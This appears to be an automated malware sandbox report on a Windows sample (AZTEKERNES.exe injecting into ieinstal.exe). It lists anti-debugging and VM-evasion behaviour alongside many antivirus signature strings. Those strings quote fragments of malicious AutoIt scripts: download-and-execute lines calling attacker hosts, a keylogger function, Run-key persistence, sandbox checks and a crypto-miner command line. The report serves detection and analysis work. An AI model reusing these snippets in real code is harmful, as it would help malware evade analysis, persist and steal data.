Source: ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	Binary or memory string: 0123456789ABCDEF0123456789abcdef\Device\\SystemRootcoroutinenewproxyLua 5.1_VERSIONpairsipairs__modekv_Gcreateresumerunningstatuswrapyieldpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_uses_single_steppingpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesizepea_dmg_unsupportedpea_dmg_importspea_dmg_invaliddatapea_dmg_decompresspea_
Source: AZTEKERNES.exe, 00000005.00000002.15128441575.0000000002D39000.00000004.00000001.sdmp, ieinstal.exe, 0000000D.00000002.19668777561.0000000004A79000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-i386.exe
Source: ieinstal.exe, 0000000D.00000002.19667070174.00000000031FF000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW7
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	Binary or memory string: qemu
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	Binary or memory string: http://pubs.vmware.com
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	Binary or memory string: SCSIDISKxxvmboxxxharddiskVMware
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	Binary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: VirtualMachineDetector
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	Binary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: % *.txt.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	Binary or memory string: ".VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	Binary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox\|vmware\|virtualpc\|sandbox\|333333\|home-off-d5f0ac\|microsof-2c393f\|123\|vwinxp-maltest")thenreturn1
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: 3svmcibex9
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: VMware Physical Disk Helper Service
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: &!*.toc.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	Binary or memory string: __tbt_isVirtualMachine
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	Binary or memory string: VBoxService.exe
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	Binary or memory string: VMWARETRAY.EXEx
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18305766772.00000138BD36A000.00000004.00000001.sdmp	Binary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18358227094.00000138BD20C000.00000004.00000001.sdmp	Binary or memory string: =8*.BIN.\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	Binary or memory string: p!#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	Binary or memory string: KF*.\|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-armel.exe

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavdlta.vdm	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\	Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	File opened: C:\Windows\SERVIC~1\	Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,	45_2_00007FF7B582ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B582B030 FindNextFileW,FindClose,FindFirstFileW,	45_2_00007FF7B582B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B57DF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,	45_2_00007FF7B57DF810
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5852504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	45_2_00007FF7B5852504

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B5830B00 GetProcessHeap,HeapFree,

45_2_00007FF7B5830B00

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F8F0C mov eax, dword ptr fs:[00000030h]	5_2_022F8F0C
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9C6A mov eax, dword ptr fs:[00000030h]	5_2_022F9C6A
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F9C86 mov eax, dword ptr fs:[00000030h]	5_2_022F9C86
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Code function: 5_2_022F89A8 mov eax, dword ptr fs:[00000030h]	5_2_022F89A8

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B584BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

45_2_00007FF7B584BD68

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 5_2_0040784E rdtsc

5_2_0040784E

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Code function: 5_2_022F2293 LdrInitializeThunk,

5_2_022F2293

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	45_2_00007FF7B584B798
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_00007FF7B584BD68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B584BF4C SetUnhandledExceptionFilter,	45_2_00007FF7B584BF4C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe	Code function: 45_2_00007FF7B5833BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_00007FF7B5833BFC

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Show sources

Source: C:\Windows\System32\wscript.exe

File created: AZTEKERNES.exe.1.dr

Jump to dropped file

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe

Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: A00000

Jump to behavior

DLL side loading technique detected

Show sources

Source: C:\Windows\System32\wscript.exe	Section loaded: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MpOAV.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MpClient.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MsMpLics.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\MsMpLics.dll	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'

Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: pwinmgmts:\\localhost\root\securitycenter
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: <select * from antivirusproduct
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/predator.ra2!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = stringreplace ( "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: " , "n" , "mi" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: chrw ( bitxor ( asc (
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = stringreverse ( "utmbjghxrnjxmtb" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojandropper:win64/miner.rw!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: xdi_destroykey
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: xdi_shutdown
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: xdi_decryptdata
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: miner.kek.gay:443 --cpu-no-yield --asm=auto --cpu-memory-pool=-1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:win32/covitse.pi!msr
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: fileinstall ( "c:\users\fud\desktop\11111111\corona.exe" , @appdatadir & "\z11062600\corona.exe" , 1 )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: shellexecute ( @appdatadir & "\z11062600\corona.exe" , "" , @appdatadir & "\z11062600" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:allowlist:injector.autoit.mx
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: #autoit3wrapper_res_field=companyname\|genesis venture investment co., ltd.
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: wisest<wisest@vip.qq.com>
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:virtool:win32/autinject.g!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $xor = bitxor ( $xor , $len + $ii )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: rtlupd64
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: execute ( "@appdatadir" ) & "\winlogons"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \windows\microsoft.net\framework\v2.0.50727\regasm.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: startup ( "winlogons.exe" , "winlogons" , "+r" , "" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#trojan:win32/autoinjec.sa!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: l_imagesearcharea ( @appdatadir & "\microsoft\1\che.bmp
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lrun ( @tempdir & "scratch.bat" , @tempdir , @sw_hide )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/autoitinject.s1
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: enativ.com
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_local_machine\software\microsoft\windows\currentversion\runonce
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \enativ\4xnav12p.txt
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = "http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/predator.ar_0109!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: global $sdeouljcvthbiisnlmbthiecg = execute
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: stringreplace ( "skxpyvmtnwvrovjagkuhnqvobgbtrkxpyvmtnwvrovjagkuhnqvobgbinkxpyv
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: vobgbnkxpyvmtnwvrovjagkuhnqvobgb" , "kxpyvmtnwvrovjagkuhnqvobgb" , "" ) )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: " & ".exe"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = stringsplit ( tcuuq (
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alfper:clearlock!autoit
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $overlay = guicreate ( "clearlock" , @desktopwidth , @desktopheight ,
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: _blockinputex ( 3 , "[:alpha:]\|[:number:]\|{enter}\|{backspace}
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:hstr:trojanspy:win32/keylogger.bad!bit
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: \\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: nlogfiles-" & $date & "-" & $pwd & ".htm
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: >func _logkeypress ( $what2log )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/autoitinject.aa!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dreturn execute ( "stringtobinary($
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: lexecute ( " bitxor($xxxxx, $i, $xx)" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: d= execute ( "mod($xxxxxxx, 256)" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: := execute ( "dllstructcreate(
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/cryptedautoit.sq!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: &while wingetprocess
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: if winclose =
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: return shellexecute ( @workingdir & chr ( 92 ) & $
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: & chr ( 92 ) & $
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ] = [ "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 0.exe" , "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: `.exe" ]
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:hstr:autoit_rc4encodefunc
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 0f84dc000000b90001000088c82c0188840deffeffffe2f38365f4008365fc00817dfc00010000
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 7d478b45fc31d2f775f0920345100fb6008b4dfc0fb68c0df0feffff01c80345f425ff000000
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: return shellexecute ( $sfilepath , "" , @workingdir , "print" , $ishow = default @sw_hide $ishow )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dllcall ( "shell32.dll" , "ulong_ptr" , "shellexecutew" , "hwnd" , $hparent , $stypeofverb , $sverb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dllcall ( "shell32.dll" , "int" , "shfileoperationw"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "performing backup only"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: runwait ( @comspec & " /c "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/racealer.pa!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: inetget ( "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: ://professorlog.xyz/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .zip" , "
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .zip" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: = objcreate ( "shell.application" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: run ( "c:\users\public\run
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: .exe" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:win32/injectorautoit.sq!mtb
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 4dllopen ( "advapi32.dll" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: func _crypt_encryptdata ( $
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: p = true )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: dobjcreate ( "msxml2.domdocument" )
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: 0.datatype = "bin.base64"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: return seterror (
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:autoit/salvagedawn.b!dha
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: -dwv1.3.au3.509"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: $"4054656d70446972"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "313232"
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	Binary or memory string: "3937"
